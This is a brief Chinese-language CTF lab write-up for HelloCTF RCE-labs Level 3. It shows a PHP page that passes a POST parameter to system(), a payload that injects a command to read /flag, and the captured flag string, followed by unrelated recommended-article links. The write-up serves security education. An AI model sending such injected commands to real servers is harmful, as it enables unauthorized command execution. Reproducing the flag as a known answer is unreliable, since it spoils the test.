HelloCTF [RCE-labs] Level 3 - 命令执行

开启靶场,打开链接:

这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST'a');

system() 函数会通过软连接执行你输入的系统命令

POST传参:a=cat /flag

成功得到flag:

NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}

相关推荐
后台模板学习13 小时前
2026最新面试真题:到达用英语怎么说背后的逻辑与源码剖析
面试·职场和发展·php
少陽君15 小时前
Python 并发编程:IO 等待用线程/asyncio,CPU 计算才用进程
数据库·python·php
Bruce_Liuxiaowei16 小时前
从两个中危漏洞读懂 CVSS 评分体系:向量拆解、数学计算与实战观察
安全·网络安全·漏洞评级
盛世宏博智慧档案17 小时前
高速 ETC 门架外场机房温湿度远程监测解决方案
服务器·数据库·php·高度·高速·温湿度
luj_176817 小时前
一线一区一变破解人盯人防守密码
开发语言·网络·c++·经验分享·算法
我的小卷呀18 小时前
Linux ip 命令底层逻辑与实战指南
linux·运维·c语言·网络协议·tcp/ip·网络安全
luj_176818 小时前
中锋卡位与开放线博弈
c语言·开发语言·网络·经验分享·算法
祁白_18 小时前
防御引擎绕过方法
笔记·web安全·php·防御引擎
tianxuanjg18 小时前
工业/协作机器人不锈钢精密零件批量加工难点与量产解决方案
人工智能·经验分享·机器人·无人机·制造
一只鹿鹿鹿20 小时前
信息网络安全建设方案(PPT文件)
大数据·安全·web安全·系统安全·制造